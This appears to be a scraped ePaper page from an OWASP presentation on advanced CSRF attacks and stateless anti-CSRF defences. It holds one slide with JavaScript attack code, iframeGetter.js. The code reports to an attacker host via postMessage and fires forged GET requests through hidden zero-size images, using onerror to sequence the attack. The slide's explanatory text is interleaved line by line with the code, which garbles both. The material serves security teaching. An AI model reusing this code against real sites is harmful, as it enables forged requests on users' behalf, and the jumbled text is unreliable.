Advanced CSRF and Stateless Anti-CSRF - owasp
Advanced CSRF and Stateless Anti-CSRF - owasp
Advanced CSRF and Stateless Anti-CSRF - owasp
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
The onerror event will fire<br />
var IFRAME_GETTER = {};<br />
IFRAME_GETTER.haveGotten<br />
since the vulnerable<br />
= false;<br />
URL does<br />
IFRAME_GETTER.reportAndGet = function() {<br />
var imgElement; not respond with an image. We<br />
if(parent != undefined) {<br />
use that event to stop the<br />
parent.postMessage(IFRAME_ID,<br />
heart beat function. "https://attackr.se:8444");<br />
No heart<br />
}<br />
if(!IFRAME_GETTER.haveGotten) beat means the main { page<br />
imgElement<br />
knows<br />
=<br />
this<br />
document.createElement("img");<br />
step is done <strong>and</strong><br />
imgElement.setAttribute("src", GET_SRC);<br />
imgElement.setAttribute("height", can continue opening the "0"); next<br />
imgElement.setAttribute("width",<br />
iframe.<br />
"0");<br />
imgElement.setAttribute("onerror",<br />
"javascript:clearInterval(IFRAME_GETTER.intervalId)");<br />
document.body.appendChild(imgElement);<br />
IFRAME_GETTER.haveGotten = true;<br />
}<br />
};<br />
IFRAME_GETTER.onLoad = function() {<br />
IFRAME_GETTER.intervalId =<br />
setInterval(IFRAME_GETTER.reportAndGet, 1000);<br />
};<br />
iframeGetter.js